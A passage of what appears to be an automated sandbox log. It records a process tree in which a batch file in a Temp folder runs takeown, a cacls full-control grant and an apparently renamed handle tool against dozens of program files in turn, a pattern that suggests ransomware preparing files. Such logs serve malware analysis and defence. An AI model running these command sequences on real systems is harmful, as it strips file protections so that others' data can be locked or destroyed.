    cacls "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui"
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:3764
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1868
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:2084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:4896
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2424
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3500
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:2404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2616
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2864
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:4788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "background.png" -nobanner
    3⤵
    PID:2840
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    PID:2172
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      PID:3088
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:3184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      PID:3188
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3288
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  PID:3204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    PID:2056
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      PID:1056
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:3428
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:2464
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""
  2⤵
  PID:3832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"
    3⤵
    PID:908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:956
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui"
    3⤵
    PID:960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:3564
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:1520
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui""
  2⤵
  PID:4952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui"
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:2660
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:3192
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui""
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:4948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui"
    3⤵
    - Modifies file permissions
    PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:4772
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:1500
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Memo.jtp" -nobanner
    3⤵
    PID:5020
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Memo.jtp" -nobanner
      4⤵
      PID:4072
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui""
  2⤵
  PID:3972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:4744
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  PID:4740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:3980
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:2356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3364
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:3336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    - Modifies file permissions
    PID:3316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:3464
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:4132
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:3504
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:3536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:1552
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:3012
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:3908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:3928
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:3108
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:2904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:3964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:4204
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:4092
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:4184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    - Modifies file permissions
    PID:4040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:4240
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:2584
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    - Modifies file permissions
    PID:4244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:4336
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:4296
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "eng.hyp" -nobanner
    3⤵
    PID:4332
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "eng.hyp" -nobanner
      4⤵
      PID:2412
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:4304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "zdingbat.txt" -nobanner
    3⤵
    PID:4588
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "zdingbat.txt" -nobanner
      4⤵
      PID:4264
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:4608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "TURKISH.TXT" -nobanner
    3⤵
    PID:988
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:4356
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Mail\es-ES\WinMail.exe.mui""
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\cacls.exe
